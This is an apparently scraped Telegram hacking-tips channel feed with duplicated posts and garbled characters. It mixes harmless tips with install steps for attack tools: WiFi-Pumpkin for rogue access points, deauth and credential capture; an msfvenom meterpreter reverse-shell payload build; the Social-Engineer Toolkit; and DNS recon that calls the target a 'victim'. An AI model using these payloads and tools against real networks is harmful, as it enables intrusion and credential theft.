β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Decryption and encryption for beginers :
#forbeginers
1) Encryption and decryption of software is a fascinating field of research, which can be closely integrated with almost any computer technology-cryptography, programming languages, operating systems, and data structures. Without encryption technology,
2) any network security is empty talk, and the application of encryption runs through the entire network security learning process.
3) Let's first understand the program in the computer. Programs written in high-level languages will be compiled into machine language and executed on the CPU, such as Visual C++. Since machine language and assembly language have a one-to-one correspondence, machine language can be converted into assembly language. This process is called disassembly.
The assembly language may be more readable, so you can analyze the program flow and analyze its functions. This process is decryption (commonly known as cracking). In other words, the basis of decryption is built on the level of assembly language, so friends who want to get involved in this field must learn assembly language well.
4) After you have learned the assembly, it is recommended to master Win32 programming.Learning to decrypt and encrypt is very tiring, it takes a lot of time, and often hits the wall. It is very common to make no progress for three to five days. There is no secret other than diligence + perseverance. But mastering this technology can improve one's own debugging skills through tracking software, understand others' program ideas, and write better programs.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Decryption and encryption for beginers :
#forbeginers
1) Encryption and decryption of software is a fascinating field of research, which can be closely integrated with almost any computer technology-cryptography, programming languages, operating systems, and data structures. Without encryption technology,
2) any network security is empty talk, and the application of encryption runs through the entire network security learning process.
3) Let's first understand the program in the computer. Programs written in high-level languages will be compiled into machine language and executed on the CPU, such as Visual C++. Since machine language and assembly language have a one-to-one correspondence, machine language can be converted into assembly language. This process is called disassembly.
The assembly language may be more readable, so you can analyze the program flow and analyze its functions. This process is decryption (commonly known as cracking). In other words, the basis of decryption is built on the level of assembly language, so friends who want to get involved in this field must learn assembly language well.
4) After you have learned the assembly, it is recommended to master Win32 programming.Learning to decrypt and encrypt is very tiring, it takes a lot of time, and often hits the wall. It is very common to make no progress for three to five days. There is no secret other than diligence + perseverance. But mastering this technology can improve one's own debugging skills through tracking software, understand others' program ideas, and write better programs.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Firewall technology for beginers :
#fastTips
Firewall technology is an important element in network security, a barrier and a guard when the external network communicates with the internal network. In addition to having a deep understanding of the types and working principles of firewall technology, as a network security manager,
> you should also be familiar with the configuration and maintenance of various common firewalls.You should at least understand the simple configuration of the following firewalls:
1) The use of various common personal firewall software;
2) ACL-based packet filtering firewall configuration (such as Windows-based IPSec configuration, Cisco router-based ACL configuration, etc.;
3) Firewall configuration based on Linux operating system (Ipchains/Iptables);
4) ISA configuration;
5) Cisco PIX configuration;
6) Check Point firewall configuration;
7) VPN configuration based on Windows, Unix, and Cisco routers.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Firewall technology for beginers :
#fastTips
Firewall technology is an important element in network security, a barrier and a guard when the external network communicates with the internal network. In addition to having a deep understanding of the types and working principles of firewall technology, as a network security manager,
> you should also be familiar with the configuration and maintenance of various common firewalls.You should at least understand the simple configuration of the following firewalls:
1) The use of various common personal firewall software;
2) ACL-based packet filtering firewall configuration (such as Windows-based IPSec configuration, Cisco router-based ACL configuration, etc.;
3) Firewall configuration based on Linux operating system (Ipchains/Iptables);
4) ISA configuration;
5) Cisco PIX configuration;
6) Check Point firewall configuration;
7) VPN configuration based on Windows, Unix, and Cisco routers.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HOW INCREASE A UTORRENT DOWNLOAD 2020 VERSION :
1) So, to increase the download speed, we need to go to the settings
- press the key combination to Ctrl+Popen Program settings...
2) In step General put a tick Distribute all files - this will speed up the process of writing to the hard disk.
- After, intuitively, you need to go to the section Speed and in paragraph Maximum recoil speedput = 0. This is a speed limit item.
> Any other value indicates at what speed the file segment will be sent
- that is, at this point you can decrease or increase the speed. A zero value means that the speed will not be limited in any way. Maximum linked peers per torrent set equal to 100 as well as maximum connections equal to 100.
3) Pay attention to the version of your torrent client and update it to the current version.
4) Disabling instant messengers like Skype, Icq or IRQ can help. They tend to clog the channel with service information, and therefore narrow the transmission channel for the tracker.
5) Much depends on the number of seeds distributing. Seeder is a person who has a file that you are downloading.
All these methods should help you to speed up the file download from the tracker. If the speed still has not increased, then perhaps third-party programs will help you to speed up the speed of the Internet connection.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HOW INCREASE A UTORRENT DOWNLOAD 2020 VERSION :
1) So, to increase the download speed, we need to go to the settings
- press the key combination to Ctrl+Popen Program settings...
2) In step General put a tick Distribute all files - this will speed up the process of writing to the hard disk.
- After, intuitively, you need to go to the section Speed and in paragraph Maximum recoil speedput = 0. This is a speed limit item.
> Any other value indicates at what speed the file segment will be sent
- that is, at this point you can decrease or increase the speed. A zero value means that the speed will not be limited in any way. Maximum linked peers per torrent set equal to 100 as well as maximum connections equal to 100.
3) Pay attention to the version of your torrent client and update it to the current version.
4) Disabling instant messengers like Skype, Icq or IRQ can help. They tend to clog the channel with service information, and therefore narrow the transmission channel for the tracker.
5) Much depends on the number of seeds distributing. Seeder is a person who has a file that you are downloading.
All these methods should help you to speed up the file download from the tracker. If the speed still has not increased, then perhaps third-party programs will help you to speed up the speed of the Internet connection.
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
How a double-free bug in WhatsApp turns to RCE .pdf
401.2 KB
How a double-free bug in WhatsApp turns to RCE
fULL WITH PICTURES
fULL WITH PICTURES
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WIFI & ANALYSE TOPIC 2020
VIA TERMUX :
VIA LINUX :
+ Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/extension/" automatically will be listed on Pumpkin-Proxy tab.
F E A T R E S :
Rogue Wi-Fi Access Point
Deauth Attack Clients AP
Probe Request Monitor
DHCP Starvation Attack
Credentials Monitor
Transparent Proxy
Windows Update Attack
Phishing Manager
Partial Bypass HSTS protocol
Support beef hook
ARP Poison
DNS Spoof
Patch Binaries via MITM (BDF-Proxy)
LLMNR, NBT-NS and MDNS poisoner (Responder)
Pumpkin-Proxy (ProxyServer (mitmproxy API))
Capture images on the fly
TCP-Proxy (with scapy)
Moduled plugins and proxys
Wireless Mode support hostapd-mana/hostapd-karma attacks
Capitve-portals [new]
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg install git python python2
2) git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
3) cd WiFi-Pumpkin
4) ./installer.sh --install
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK WIFI & ANALYSE TOPIC 2020
VIA TERMUX :
VIA LINUX :
+ Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/extension/" automatically will be listed on Pumpkin-Proxy tab.
F E A T R E S :
Rogue Wi-Fi Access Point
Deauth Attack Clients AP
Probe Request Monitor
DHCP Starvation Attack
Credentials Monitor
Transparent Proxy
Windows Update Attack
Phishing Manager
Partial Bypass HSTS protocol
Support beef hook
ARP Poison
DNS Spoof
Patch Binaries via MITM (BDF-Proxy)
LLMNR, NBT-NS and MDNS poisoner (Responder)
Pumpkin-Proxy (ProxyServer (mitmproxy API))
Capture images on the fly
TCP-Proxy (with scapy)
Moduled plugins and proxys
Wireless Mode support hostapd-mana/hostapd-karma attacks
Capitve-portals [new]
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pkg install git python python2
2) git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
3) cd WiFi-Pumpkin
4) ./installer.sh --install
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - P0cL4bs/WiFi-Pumpkin-deprecated: DEPRECATED, wifipumpkin3 -> https://github.com/P0cL4bs/wifipumpkin3
DEPRECATED, wifipumpkin3 -> https://github.com/P0cL4bs/wifipumpkin3 - P0cL4bs/WiFi-Pumpkin-deprecated
Windows Exploitation Tricks_ Abusing the User-Mode Debugger.pdf
256.5 KB
Superb, #full windows #exploiting tutorial with pictures :)
This media is not supported in your browser
VIEW IN TELEGRAM
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This Tools is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.
F E A T U R E S :
-Whois lookup
-Traceroute
-DNS Lookup
-Reverse DNS Lookup
-GeoIP Lookup
-Port Scan
-Reverse IP Lookup
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Manisso/Crips.git
2) cd Crips && python Crips.py
3) 0 : INSTALL & UPDATE
4) -> 0
5) press 0
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦This Tools is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.
F E A T U R E S :
-Whois lookup
-Traceroute
-DNS Lookup
-Reverse DNS Lookup
-GeoIP Lookup
-Port Scan
-Reverse IP Lookup
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/Manisso/Crips.git
2) cd Crips && python Crips.py
3) 0 : INSTALL & UPDATE
4) -> 0
5) press 0
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Muting_the_Twitter_algorithm_and_using_basic_search_operators_for.pdf
2.6 MB
Muting the Twitter algorithm and using basic search operators for better OSINT research
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A GOOD PAYLOAD CREATOR FOR LINUX :
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) MANUAL INSTALL :
> $ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
> $ chmod 0755 /usr/local/bin/msfpc
B) FOR KALI :
> root@kali:~# apt install -y msfpc
π¦ E X A M P L E :
Example #1 (Windows, Fully Automated Using Manual IP)
$ bash msfpc.sh windows 192.168.1.10
* MSFvenom Payload Creator (MSFPC v1.4.4)
i IP: 192.168.1.10
i PORT: 443
i TYPE: windows (windows/meterpreter/reversetcp)
[i] CMD: msfvenom -p windows/meterpreter/reversetcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
i windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
i MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
i Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
? Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
* Done!
$
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A GOOD PAYLOAD CREATOR FOR LINUX :
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) MANUAL INSTALL :
> $ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
> $ chmod 0755 /usr/local/bin/msfpc
B) FOR KALI :
> root@kali:~# apt install -y msfpc
π¦ E X A M P L E :
Example #1 (Windows, Fully Automated Using Manual IP)
$ bash msfpc.sh windows 192.168.1.10
* MSFvenom Payload Creator (MSFPC v1.4.4)
i IP: 192.168.1.10
i PORT: 443
i TYPE: windows (windows/meterpreter/reversetcp)
[i] CMD: msfvenom -p windows/meterpreter/reversetcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
i windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
i MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
i Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
? Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
* Done!
$
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST OFFICE FOR LINUX :
-https://www.libreoffice.org/
-https://www.wps.com/
-https://www.openoffice.org/
-https://www.onlyoffice.com/
-https://www.freeoffice.com/en/
-http://www.davidmorelo.com
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST OFFICE FOR LINUX :
-https://www.libreoffice.org/
-https://www.wps.com/
-https://www.openoffice.org/
-https://www.onlyoffice.com/
-https://www.freeoffice.com/en/
-http://www.davidmorelo.com
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.libreoffice.org
Home | LibreOffice - Free and private office suite - Based on OpenOffice - Compatible with Microsoft
Free office suite β the evolution of OpenOffice. Compatible with Microsoft .doc, .docx, .xls, .xlsx, .ppt, .pptx. Updated regularly, community powered.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DNS HACKING-
Dig for DNS information:
> Dig is a tool to help sort out crazy DNS problems because people do weird things and when youβre trying to set up hosting, you run into the slot. So, let me tell you about the dig.
> Dig is a simple tool but has a lot of features because DNS has a lot of features, and what dig does is a command-line tool built into Linux by thinking thereβs a port you can find for other operating systems. But, itβs a quick way to query directly at different DNS servers to see if there are records that are showing differently from one place to another.
> Dig is done to get the information about the authoritative name and also to get the server name.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Open kali terminal and type :
1) $ dig sans.org
2) You can see it grabs the IP address of sans.org, i.e., 45.60.31.34
Now if we wish to find their email servers, we simply add mx to the end of command as shown below:
$ dig sans.org mx
3) Open Dnsenum
Dnsenum is a tool that kali and Backtrack own that does everything did do and much more. Where to find it? You can find it by approaching DNSenum in the applications.
4) Run Dnsenum
Letβs use this simple yet effective tool against SANS and by querying domain look for any additional information regarding their servers and subdomains. It is important to notice that all this reconnaissance is passive. The victim will never know we are casing their systems because we are not touching their systems at all, just the DNS servers look like normal traffic.
$ dnsenum sans.org -f /usr/share/dirbuster/wordlists/directories.jbrofuzz
5) $ locate wordlist
E N J O Y β€οΈππ»
U S E F O R L E A R N
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DNS HACKING-
Dig for DNS information:
> Dig is a tool to help sort out crazy DNS problems because people do weird things and when youβre trying to set up hosting, you run into the slot. So, let me tell you about the dig.
> Dig is a simple tool but has a lot of features because DNS has a lot of features, and what dig does is a command-line tool built into Linux by thinking thereβs a port you can find for other operating systems. But, itβs a quick way to query directly at different DNS servers to see if there are records that are showing differently from one place to another.
> Dig is done to get the information about the authoritative name and also to get the server name.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
Open kali terminal and type :
1) $ dig sans.org
2) You can see it grabs the IP address of sans.org, i.e., 45.60.31.34
Now if we wish to find their email servers, we simply add mx to the end of command as shown below:
$ dig sans.org mx
3) Open Dnsenum
Dnsenum is a tool that kali and Backtrack own that does everything did do and much more. Where to find it? You can find it by approaching DNSenum in the applications.
4) Run Dnsenum
Letβs use this simple yet effective tool against SANS and by querying domain look for any additional information regarding their servers and subdomains. It is important to notice that all this reconnaissance is passive. The victim will never know we are casing their systems because we are not touching their systems at all, just the DNS servers look like normal traffic.
$ dnsenum sans.org -f /usr/share/dirbuster/wordlists/directories.jbrofuzz
5) $ locate wordlist
E N J O Y β€οΈππ»
U S E F O R L E A R N
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HOW SPEEDUP FIREFOX 50X FASTER BY OFFICIAL FIREFOX SUPPORT :
1) Refresh Firefox
We are constantly improving Firefox. The latest version is faster than ever before and contains fixes for many issues that could slow down your Firefox. See Update Firefox to the latest version for instructions on how to update it.
2) Update your graphics card drivers
Outdated drivers can slow down performance. Check the video card manufacturer's instructions on how to update your video drivers.
3) High consumption of hardware resources
If the monitoring tool shows high utilization of hardware resources, try the tips in Firefox is using too much random access memory (RAM) - how to fix it .
4) Firefox freezes or not responding
If Firefox stops responding and a spinning wheel appears instead of the cursor and the window turns white , see Firefox freezes or not responding - how to fix it .
5) I see a warning about an unresponsive script
βUnresponsive script warningβ? What does this even mean? Believe it or not, for this case, we have an article Failure Scenario Warning - What it means and how to fix it , which will help clarify the situation.
6) Firefox takes a long time to start
Try following the tips in this article Firefox takes too long to start .
7) Check your computer for malware
To resolve slowness issues not specifically mentioned in this article, you should scan your computer for viruses, spyware, and other malware and read the article Troubleshoot Firefox problems caused by malware .
8) Optimize Windows
Speed up Windows can improve the performance of your computer. Read Tips to improve the performance of your Windows 10 PC at microsoft.com.
9) Block unwanted content
Content that you don't need, such as ads or a tracking script, can slow down your page load significantly. Firefox's built-in content blocking can speed up page loading by preventing third-party trackers from loading.
10) There are also Firefox add-ons that can block content you don't need, for example:
-The Disconnect add-on blocks invisible web page content that is tracking you online.
-The uBlock Origin add-on blocks ads, tracking services and other unwanted content, while being less memory and CPU intensive than other blockers.
-The NoScript add-on allows you to selectively enable or disable all runnable scripts on websites.
E N J O Y β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HOW SPEEDUP FIREFOX 50X FASTER BY OFFICIAL FIREFOX SUPPORT :
1) Refresh Firefox
We are constantly improving Firefox. The latest version is faster than ever before and contains fixes for many issues that could slow down your Firefox. See Update Firefox to the latest version for instructions on how to update it.
2) Update your graphics card drivers
Outdated drivers can slow down performance. Check the video card manufacturer's instructions on how to update your video drivers.
3) High consumption of hardware resources
If the monitoring tool shows high utilization of hardware resources, try the tips in Firefox is using too much random access memory (RAM) - how to fix it .
4) Firefox freezes or not responding
If Firefox stops responding and a spinning wheel appears instead of the cursor and the window turns white , see Firefox freezes or not responding - how to fix it .
5) I see a warning about an unresponsive script
βUnresponsive script warningβ? What does this even mean? Believe it or not, for this case, we have an article Failure Scenario Warning - What it means and how to fix it , which will help clarify the situation.
6) Firefox takes a long time to start
Try following the tips in this article Firefox takes too long to start .
7) Check your computer for malware
To resolve slowness issues not specifically mentioned in this article, you should scan your computer for viruses, spyware, and other malware and read the article Troubleshoot Firefox problems caused by malware .
8) Optimize Windows
Speed up Windows can improve the performance of your computer. Read Tips to improve the performance of your Windows 10 PC at microsoft.com.
9) Block unwanted content
Content that you don't need, such as ads or a tracking script, can slow down your page load significantly. Firefox's built-in content blocking can speed up page loading by preventing third-party trackers from loading.
10) There are also Firefox add-ons that can block content you don't need, for example:
-The Disconnect add-on blocks invisible web page content that is tracking you online.
-The uBlock Origin add-on blocks ads, tracking services and other unwanted content, while being less memory and CPU intensive than other blockers.
-The NoScript add-on allows you to selectively enable or disable all runnable scripts on websites.
E N J O Y β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
Windows - WPAD poisoning using Responder.pdf
1.4 MB
Windows Hacking
- exploit
- WPAD poisoning using Responder
- full tutorial with pictures
- exploit
- WPAD poisoning using Responder
- full tutorial with pictures
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦System security hidden file method to protect personal privacy :
1)) The first method is also the simplest: modify the attributes of the file directory
This method is the simplest, as long as you select the directory you want to hide, click the right mouse button, select "Properties", and tick "β" in the "Hidden" property check box. In this way, the directory has hidden attributes. This method is the simplest, but the security is also poor. As long as in the window "Tools", select "Folder Options" in the menu, and then select "Show All Files" in the "Hidden Files" part of "View" to display the hidden directories.
2)) The second method: hide through software encryption
There are many encryption hiding software under Windows, such as Magic Folders, EMF, etc., which can be used to hide or even encrypt directories. Here is a brief introduction to the use of EMF. First install EMF, generate a password disk during the installation process, insert the disk during operation, EMF checks the password on the disk, and enter the corresponding account, and then run the Magic.exe program and you will be asked to enter the password. This password will be entered later EMF password. If you want to display the directory again, you must also enter this password.
3)) The third method: hide through hard disk partition
Store the data to be encrypted in a special hard disk partition, and then use partition tools such as PQmagic to set this partition as a hidden partition. The specific method is: first start in DOS mode, then run PQmagic, select the partition you want to hide, select Hidepartition under Advanced in the Operations menu, exit, and restart. If you want to restore again, use the same method to enter PQmagic and remove the hidden partition. This method has strong concealment, but it also has certain dangers and may cause certain damage to the hard disk, so you should be cautious when using this method.
4)) The fourth method: alternative methods
Move the file to be hidden to a temporary folder, and then use WinZip or WinRAR with a password to compress it into a file. At this time, you can see in the "Explorer" that it was compressed with WinZip or WinRAR, some people Naturally, the corresponding decryptor will be used to decrypt it. And we changed its extension from ZIP or RAR to a non-existent file extension, such as SYJ, after double-clicking it, WinZip or WinRAR will not start and open it. However, you have to remember its real extension, and change the extension when you want to use it.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦System security hidden file method to protect personal privacy :
1)) The first method is also the simplest: modify the attributes of the file directory
This method is the simplest, as long as you select the directory you want to hide, click the right mouse button, select "Properties", and tick "β" in the "Hidden" property check box. In this way, the directory has hidden attributes. This method is the simplest, but the security is also poor. As long as in the window "Tools", select "Folder Options" in the menu, and then select "Show All Files" in the "Hidden Files" part of "View" to display the hidden directories.
2)) The second method: hide through software encryption
There are many encryption hiding software under Windows, such as Magic Folders, EMF, etc., which can be used to hide or even encrypt directories. Here is a brief introduction to the use of EMF. First install EMF, generate a password disk during the installation process, insert the disk during operation, EMF checks the password on the disk, and enter the corresponding account, and then run the Magic.exe program and you will be asked to enter the password. This password will be entered later EMF password. If you want to display the directory again, you must also enter this password.
3)) The third method: hide through hard disk partition
Store the data to be encrypted in a special hard disk partition, and then use partition tools such as PQmagic to set this partition as a hidden partition. The specific method is: first start in DOS mode, then run PQmagic, select the partition you want to hide, select Hidepartition under Advanced in the Operations menu, exit, and restart. If you want to restore again, use the same method to enter PQmagic and remove the hidden partition. This method has strong concealment, but it also has certain dangers and may cause certain damage to the hard disk, so you should be cautious when using this method.
4)) The fourth method: alternative methods
Move the file to be hidden to a temporary folder, and then use WinZip or WinRAR with a password to compress it into a file. At this time, you can see in the "Explorer" that it was compressed with WinZip or WinRAR, some people Naturally, the corresponding decryptor will be used to decrypt it. And we changed its extension from ZIP or RAR to a non-existent file extension, such as SYJ, after double-clicking it, WinZip or WinRAR will not start and open it. However, you have to remember its real extension, and change the extension when you want to use it.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AgentTesla spy Trojan's new trick :
#News
> Tesla RAT (Remote Access Trojan Horse) has become one of the most popular malware series threatening enterprises in the first half of 2020. The number of attacks discovered even exceeds TrickBot or Emotet, second only to Dridex. Although the Agent RAT has existed for at least 6 years, it is still adapting and evolving, frustrating the security efforts of many organizations. During the COVID-19 pandemic, new variants with additional features were introduced, and the malware has been widely used in phishing campaigns with the theme of coronavirus.
> The core of AgentTesla is a keylogger and information stealer. AgentTesla was first discovered at the end of 2014, and its usage has been increasing steadily in the past 1-2 years. The malware was initially sold in various underground forums and markets, as well as its own AgentTesla.com website (now discontinued). Like many contemporary agents, AgentTesla also provides the malware itself and a data collection management panel , The information obtained from the attacked device can be quickly obtained to the attacker through the panel interface.
#news
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AgentTesla spy Trojan's new trick :
#News
> Tesla RAT (Remote Access Trojan Horse) has become one of the most popular malware series threatening enterprises in the first half of 2020. The number of attacks discovered even exceeds TrickBot or Emotet, second only to Dridex. Although the Agent RAT has existed for at least 6 years, it is still adapting and evolving, frustrating the security efforts of many organizations. During the COVID-19 pandemic, new variants with additional features were introduced, and the malware has been widely used in phishing campaigns with the theme of coronavirus.
> The core of AgentTesla is a keylogger and information stealer. AgentTesla was first discovered at the end of 2014, and its usage has been increasing steadily in the past 1-2 years. The malware was initially sold in various underground forums and markets, as well as its own AgentTesla.com website (now discontinued). Like many contemporary agents, AgentTesla also provides the malware itself and a data collection management panel , The information obtained from the attacked device can be quickly obtained to the attacker through the panel interface.
#news
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC EXPLOITATION 2020 updated :
The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC β an information security consulting firm located in Cleveland, Ohio.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install -r requirements.txt python setup.py
2) git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
3) cd setoolkit
4) pip3 install -r requirements.txt
5) python setup.py
6) choose options via numbers
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC EXPLOITATION 2020 updated :
The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC β an information security consulting firm located in Cleveland, Ohio.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install -r requirements.txt python setup.py
2) git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
3) cd setoolkit
4) pip3 install -r requirements.txt
5) python setup.py
6) choose options via numbers
E N J O Y β€οΈππ»
U S E F O R L E A R N
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 new extensions for speedup browsing :
A)) for chrome :
https://chrome.google.com/webstore/detail/fasterchrome/nmgpnfccjfjhdenioncabecepjcmdnjg
> https://chrome.google.com/webstore/detail/web-boost-wait-less-brows/ahbkhnpmoamidjgbneafjipbmdfpefad
> https://chrome.google.com/webstore/detail/amp-browser-extension/mccnchmofleakpdohkmljohfckgpdehb/
> https://chrome.google.com/webstore/detail/mcafee%C2%AE-web-boost/klekeajafkkpokaofllcadenjdckhinm?hl=en
B)) MULTI :
Block Comments Everywhere
- https://chrome.google.com/webstore/detail/shut-up-comment-blocker/oklfoejikkmejobodofaimigojomlfim
-https://addons.mozilla.org/en-US/firefox/addon/shut-up-comment-blocker/
-https://safari-extensions.apple.com/details/?id=net.rickyromero.shutup-TMM5P68287
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 new extensions for speedup browsing :
A)) for chrome :
https://chrome.google.com/webstore/detail/fasterchrome/nmgpnfccjfjhdenioncabecepjcmdnjg
> https://chrome.google.com/webstore/detail/web-boost-wait-less-brows/ahbkhnpmoamidjgbneafjipbmdfpefad
> https://chrome.google.com/webstore/detail/amp-browser-extension/mccnchmofleakpdohkmljohfckgpdehb/
> https://chrome.google.com/webstore/detail/mcafee%C2%AE-web-boost/klekeajafkkpokaofllcadenjdckhinm?hl=en
B)) MULTI :
Block Comments Everywhere
- https://chrome.google.com/webstore/detail/shut-up-comment-blocker/oklfoejikkmejobodofaimigojomlfim
-https://addons.mozilla.org/en-US/firefox/addon/shut-up-comment-blocker/
-https://safari-extensions.apple.com/details/?id=net.rickyromero.shutup-TMM5P68287
E N J O Y β€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google
FasterWeb - Chrome Web Store
Browse the web faster.